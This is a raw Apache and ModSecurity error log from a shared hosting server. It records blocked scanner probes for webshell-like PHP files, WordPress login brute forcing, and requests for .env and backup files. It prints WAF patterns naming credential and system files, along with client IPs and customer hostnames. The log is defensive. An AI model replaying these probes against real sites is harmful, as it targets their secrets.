[Tue May 26 12:45:13.009365 2026] [security2:error] [pid 448967:tid 449216] [client 4.201.75.230:46068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bless.php"] [unique_id "ahVIgeXLPuWQsfM-UVSXVgAAAHc"]
[Tue May 26 12:45:14.100348 2026] [security2:error] [pid 448967:tid 449153] [client 4.201.75.230:46025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/aa.php"] [unique_id "ahVIguXLPuWQsfM-UVSXcAAAADg"]
[Tue May 26 12:45:14.368584 2026] [security2:error] [pid 448967:tid 449131] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVIgeXLPuWQsfM-UVSXaAAAACI"]
[Tue May 26 12:45:14.629676 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIguXLPuWQsfM-UVSXdgAAADY"]
[Tue May 26 12:45:15.125991 2026] [ssl:error] [pid 448967:tid 449169] [client 98.84.1.175:11834] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname autoconfig.madhuraclinic.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:45:16.321266 2026] [security2:error] [pid 448967:tid 449104] [client 92.246.141.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIg-XLPuWQsfM-UVSXowAAAAc"]
[Tue May 26 12:45:16.924684 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIhOXLPuWQsfM-UVSXsQAAAHk"]
[Tue May 26 12:45:16.963284 2026] [security2:error] [pid 448967:tid 449153] [client 4.201.75.230:46030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmrlpc.php"] [unique_id "ahVIhOXLPuWQsfM-UVSXwQAAADg"]
[Tue May 26 12:45:17.667296 2026] [security2:error] [pid 448967:tid 449115] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIheXLPuWQsfM-UVSXyQAAABI"], referer: https://www.anujtradingco.com/
[Tue May 26 12:45:18.945513 2026] [security2:error] [pid 448967:tid 449104] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIhuXLPuWQsfM-UVSX4QAAAAc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 12:45:19.048003 2026] [security2:error] [pid 448967:tid 449173] [client 4.201.75.230:46065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/class.php"] [unique_id "ahVIh-XLPuWQsfM-UVSX6AAAAEw"]
[Tue May 26 12:45:19.749787 2026] [security2:error] [pid 448967:tid 449109] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIh-XLPuWQsfM-UVSX8AAAAAw"]
[Tue May 26 12:45:20.080134 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:57872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIiOXLPuWQsfM-UVSYBQAAAA8"]
[Tue May 26 12:45:20.080279 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:57872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIiOXLPuWQsfM-UVSYBQAAAA8"]
[Tue May 26 12:45:22.007617 2026] [security2:error] [pid 448967:tid 449132] [client 4.201.75.230:46066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/aw.php"] [unique_id "ahVIiuXLPuWQsfM-UVSYLgAAACM"]
[Tue May 26 12:45:23.145648 2026] [security2:error] [pid 448967:tid 449186] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIiuXLPuWQsfM-UVSYRAAAAFk"]
[Tue May 26 12:45:23.195473 2026] [security2:error] [pid 448967:tid 449224] [client 4.201.75.230:46020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bb.php"] [unique_id "ahVIi-XLPuWQsfM-UVSYUgAAAH8"]
[Tue May 26 12:45:23.671727 2026] [security2:error] [pid 448967:tid 449174] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIi-XLPuWQsfM-UVSYWwAAAE0"], referer: https://anujtradingco.com
[Tue May 26 12:45:25.696531 2026] [security2:error] [pid 448967:tid 449194] [client 4.201.75.230:46037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/222.php"] [unique_id "ahVIjeXLPuWQsfM-UVSYjQAAAGE"]
[Tue May 26 12:45:26.339312 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIjeXLPuWQsfM-UVSYlAAAAAM"]
[Tue May 26 12:45:27.478720 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/test1.php"] [unique_id "ahVIj-XLPuWQsfM-UVSYsQAAAA0"]
[Tue May 26 12:45:29.215077 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIkOXLPuWQsfM-UVSYxgAAADM"]
[Tue May 26 12:45:29.322572 2026] [security2:error] [pid 448967:tid 449200] [client 149.62.41.5:54310] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "149.62.41.5" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVIkeXLPuWQsfM-UVSY0wAAAGc"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 12:45:30.638902 2026] [security2:error] [pid 448967:tid 449139] [client 157.20.138.61:58225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIkuXLPuWQsfM-UVSY8AAAACo"]
[Tue May 26 12:45:30.639077 2026] [security2:error] [pid 448967:tid 449139] [client 157.20.138.61:58225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIkuXLPuWQsfM-UVSY8AAAACo"]
[Tue May 26 12:45:31.917741 2026] [security2:error] [pid 448967:tid 449159] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIk-XLPuWQsfM-UVSZAAAAAD4"]
[Tue May 26 12:45:34.614213 2026] [security2:error] [pid 448967:tid 449109] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIluXLPuWQsfM-UVSZLwAAAAw"]
[Tue May 26 12:45:35.394082 2026] [security2:error] [pid 448967:tid 449104] [client 62.60.130.233:53629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "organicveggie.tk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIl-XLPuWQsfM-UVSZQwAAAAc"], referer: https://www.linkedin.com/
[Tue May 26 12:45:35.731990 2026] [security2:error] [pid 448967:tid 449125] [client 62.60.130.233:55779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "organicveggie.tk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIl-XLPuWQsfM-UVSZSgAAABw"], referer: https://www.facebook.com/
[Tue May 26 12:45:37.360126 2026] [security2:error] [pid 448967:tid 449216] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVImOXLPuWQsfM-UVSZYwAAAHc"]
[Tue May 26 12:45:37.385575 2026] [security2:error] [pid 448967:tid 449114] [client 4.201.75.230:5260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/css/autoload_classmap.php"] [unique_id "ahVImeXLPuWQsfM-UVSZcQAAABE"]
[Tue May 26 12:45:37.645421 2026] [security2:error] [pid 448967:tid 449176] [client 31.57.184.107:53268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "zeexo.glorodrc.com"] [uri "/wp-login.php"] [unique_id "ahVImeXLPuWQsfM-UVSZdgAAAE8"], referer: https://duckduckgo.com/
[Tue May 26 12:45:38.019321 2026] [security2:error] [pid 448967:tid 449071] [remote 111.229.141.137:36658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVImeXLPuWQsfM-UVSZewAAIWc"]
[Tue May 26 12:45:38.341290 2026] [security2:error] [pid 448967:tid 449196] [client 54.87.247.130:35372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "keydussecurity.com"] [uri "/"] [unique_id "ahVImuXLPuWQsfM-UVSZhwAAAGM"]
[Tue May 26 12:45:40.486036 2026] [security2:error] [pid 448967:tid 449123] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZvQAAABo"], referer: https://www.anujtradingco.com/
[Tue May 26 12:45:40.596158 2026] [security2:error] [pid 448967:tid 449155] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZtAAAADo"]
[Tue May 26 12:45:40.848124 2026] [security2:error] [pid 448967:tid 449140] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZyQAAACs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430734&moderation-hash=a20bc0fb2911a8e00a99b53c3f34fd6d
[Tue May 26 12:45:41.311487 2026] [security2:error] [pid 448967:tid 449215] [client 157.20.138.61:58575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ3AAAAHY"]
[Tue May 26 12:45:41.311659 2026] [security2:error] [pid 448967:tid 449215] [client 157.20.138.61:58575] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ3AAAAHY"]
[Tue May 26 12:45:41.557397 2026] [security2:error] [pid 448967:tid 449164] [client 202.76.169.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ2QAAAEM"]
[Tue May 26 12:45:41.681349 2026] [security2:error] [pid 448967:tid 449132] [client 5.255.125.45:33870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "axum-vermogen.eu"] [uri "/.env.local"] [unique_id "ahVIneXLPuWQsfM-UVSZ7QAAACM"]
[Tue May 26 12:45:41.681496 2026] [security2:error] [pid 448967:tid 449132] [client 5.255.125.45:33870] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "axum-vermogen.eu"] [uri "/.env.local"] [unique_id "ahVIneXLPuWQsfM-UVSZ7QAAACM"]
[Tue May 26 12:45:41.684531 2026] [security2:error] [pid 448967:tid 449199] [client 5.255.125.45:33872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env"] [unique_id "ahVIneXLPuWQsfM-UVSZ7gAAAGY"]
[Tue May 26 12:45:41.897765 2026] [security2:error] [pid 448967:tid 449161] [client 5.255.125.45:33872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env.bak"] [unique_id "ahVIneXLPuWQsfM-UVSZ9AAAAEA"]
[Tue May 26 12:45:41.925584 2026] [security2:error] [pid 448967:tid 449207] [client 5.255.125.45:33880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env.backup"] [unique_id "ahVIneXLPuWQsfM-UVSZ9QAAAG4"]
[Tue May 26 12:45:42.444833 2026] [core:error] [pid 448967:tid 449215] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.444850 2026] [core:error] [pid 448967:tid 449215] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.449228 2026] [core:error] [pid 448967:tid 449101] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.449251 2026] [core:error] [pid 448967:tid 449101] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:43.490448 2026] [security2:error] [pid 448967:tid 449183] [client 4.201.75.230:5268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/fx.php"] [unique_id "ahVIn-XLPuWQsfM-UVSaMwAAAFY"]
[Tue May 26 12:45:43.540264 2026] [security2:error] [pid 448967:tid 449210] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIn-XLPuWQsfM-UVSaLAAAAHE"]
[Tue May 26 12:45:44.595444 2026] [security2:error] [pid 448967:tid 449116] [client 85.208.96.203:16924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-10-30/"] [unique_id "ahVIoOXLPuWQsfM-UVSaRwAAABM"]
[Tue May 26 12:45:44.595582 2026] [security2:error] [pid 448967:tid 449116] [client 85.208.96.203:16924] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-10-30/"] [unique_id "ahVIoOXLPuWQsfM-UVSaRwAAABM"]
[Tue May 26 12:45:44.837423 2026] [security2:error] [pid 448967:tid 449212] [client 4.201.75.230:46028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/gelay.php"] [unique_id "ahVIoOXLPuWQsfM-UVSaTgAAAHM"]
[Tue May 26 12:45:45.858408 2026] [security2:error] [pid 448967:tid 449126] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIoeXLPuWQsfM-UVSaWwAAAB0"]
[Tue May 26 12:45:46.312573 2026] [security2:error] [pid 448967:tid 449216] [client 4.201.75.230:46042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/god4m.php"] [unique_id "ahVIouXLPuWQsfM-UVSacAAAAHc"]
[Tue May 26 12:45:46.484745 2026] [security2:error] [pid 448967:tid 449199] [client 69.48.202.178:61824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIouXLPuWQsfM-UVSabwAAAGY"], referer: https://anujtradingco.com
[Tue May 26 12:45:46.785019 2026] [security2:error] [pid 448967:tid 449097] [client 69.48.202.178:61915] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIouXLPuWQsfM-UVSaeAAAAAA"], referer: https://anujtradingco.com
[Tue May 26 12:45:47.746963 2026] [security2:error] [pid 448967:tid 449165] [client 172.226.44.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVIouXLPuWQsfM-UVSaawAAAEQ"]
[Tue May 26 12:45:47.859312 2026] [security2:error] [pid 448967:tid 449133] [client 4.201.75.230:5257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/mari.php"] [unique_id "ahVIo-XLPuWQsfM-UVSajwAAACQ"]
[Tue May 26 12:45:48.582248 2026] [security2:error] [pid 448967:tid 449099] [client 43.157.62.101:41528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.62.157.43.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-signup.php"] [unique_id "ahVIpOXLPuWQsfM-UVSanAAAAAI"], referer: http://www.rainadelproperties.com.taotechservices.com
[Tue May 26 12:45:48.905873 2026] [security2:error] [pid 448967:tid 449223] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIpOXLPuWQsfM-UVSamwAAAH4"]
[Tue May 26 12:45:48.943218 2026] [core:crit] [pid 448967:tid 449098] (13)Permission denied: [client 74.7.175.149:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
